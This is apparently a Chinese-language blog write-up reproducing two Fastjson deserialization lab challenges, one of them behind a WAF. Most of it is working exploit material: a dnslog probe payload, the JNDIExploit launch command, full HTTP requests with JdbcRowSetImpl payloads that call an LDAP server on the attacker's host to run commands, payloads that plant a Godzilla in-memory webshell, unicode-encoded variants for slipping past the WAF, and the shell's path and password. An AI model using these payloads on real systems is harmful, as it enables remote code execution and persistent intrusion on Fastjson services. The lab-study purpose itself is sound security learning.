xFeedBeta
xChar
·7 hours ago

01-1247-jndi

漏洞利用

参考:https://github.com/lemono0/FastJsonPart

主打一个过程复现,理解漏洞利用流程,网上很多大佬的文章,文章写的很好,但作为基础学习还是不够(特别是用 idea 编译 java 文件,如何解决依赖等基础问题,-__-|.),所以就把自己复现过程的流程写下。

启动环境,访问站点,抓取登陆处的包

Pasted image 20250102111457

尝试删除 json 语法的右括号,使其报错

Pasted image 20250102111558

dnslog 测试是否存在漏洞

{
  "@type":"java.net.Inet4Address",
  "val":"9dny9mz50wyzzxt8yyg9mk2kkbq2es2h.oastify.com"
}

Pasted image 20250102111756

报错探测 fastjson 的版本

{
  "@type": "java.lang.AutoCloseable"

Pasted image 20250102111955

启动 JNDI

java -jar .\JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.80.53

使用 TomcatBypass Queries

ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho

发送如下 payload

POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 280
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
cmd: whoami

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.80.53:1389/TomcatBypass/TomcatEcho",
        "autoCommit":true
    }
}

Pasted image 20250102112359

Pasted image 20250102112444

打入哥斯拉的内存马

POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 286
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.80.53:1389/TomcatBypass/GodzillaMemshell",
        "autoCommit":true
    }
}

Pasted image 20250102113530

payload:

ldap://0.0.0.0:1389/TomcatBypass/GodzillaMemshell /bteam.ico pass1024

Pasted image 20250102113503

02-1247-jndi-waf

启动环境,访问站点,抓取登录处的包

Pasted image 20250106105819

删除右括号,使其报错,说明服务器解析了 json 内容

Pasted image 20250106105947

添加双引号,也返回报错信息

Pasted image 20250106110038

探测 fastjson 精确版本,发现过滤了

{
  "@type": "java.lang.AutoCloseable"

Pasted image 20250106110159

fastjson 识别 hex 和 unicode 编码,可以对 payload 进行 hex 和 unicode 编码绕过

{
  "\u0040\u0074\u0079\u0070\u0065": "\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0041\u0075\u0074\u006F\u0043\u006C\u006F\u0073\u0065\u0061\u0062\u006C\u0065"

Pasted image 20250106111051

jdk8 启动

Pasted image 20250106112259

使用通用 payload

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.80.245:1389/TomcatBypass/TomcatEcho",
        "autoCommit":true
    }
}

编码

{
    "a":{
        "\u0040\u0074\u0079\u0070\u0065":"\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0043\u006C\u0061\u0073\u0073",
        "\u0076\u0061\u006C":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C"
    },
    "b":{
        "\u0040\u0074\u0079\u0070\u0065":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C",
        "\u0064\u0061\u0074\u0061\u0053\u006F\u0075\u0072\u0063\u0065\u004E\u0061\u006D\u0065":"\u006C\u0064\u0061\u0070\u003A\u002F\u002F\u0031\u0039\u0032\u002E\u0031\u0036\u0038\u002E\u0038\u0030\u002E\u0032\u0034\u0035\u003A\u0031\u0033\u0038\u0039\u002F\u0054\u006F\u006D\u0063\u0061\u0074\u0042\u0079\u0070\u0061\u0073\u0073\u002F\u0054\u006F\u006D\u0063\u0061\u0074\u0045\u0063\u0068\u006F",
        "\u0061\u0075\u0074\u006F\u0043\u006F\u006D\u006D\u0069\u0074":"\u0074\u0072\u0075\u0065"
    }
}

Pasted image 20250106112338

执行命令

Pasted image 20250106112420

打哥斯拉内存马

{
    "a":{
        "\u0040\u0074\u0079\u0070\u0065":"\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0043\u006C\u0061\u0073\u0073",
        "\u0076\u0061\u006C":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C"
    },
    "b":{
        "\u0040\u0074\u0079\u0070\u0065":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C",
        "\u0064\u0061\u0074\u0061\u0053\u006F\u0075\u0072\u0063\u0065\u004E\u0061\u006D\u0065":"\u006C\u0064\u0061\u0070\u003A\u002F\u002F\u0031\u0039\u0032\u002E\u0031\u0036\u0038\u002E\u0038\u0030\u002E\u0032\u0034\u0035\u003A\u0031\u0033\u0038\u0039\u002F\u0054\u006F\u006D\u0063\u0061\u0074\u0042\u0079\u0070\u0061\u0073\u0073\u002F\u0047\u006F\u0064\u007A\u0069\u006C\u006C\u0061\u004D\u0065\u006D\u0073\u0068\u0065\u006C\u006C",
        "\u0061\u0075\u0074\u006F\u0043\u006F\u006D\u006D\u0069\u0074":"\u0074\u0072\u0075\u0065"
    }
}

Pasted image 20250106143522

哥斯拉连接

http://192.168.80.53/bteam.ico
pass1024

Pasted image 20250106143543

Loading comments...
Crossbell Logo
Crossbell Chain
Ipfs Logo
IPFS
Source
Post on xlog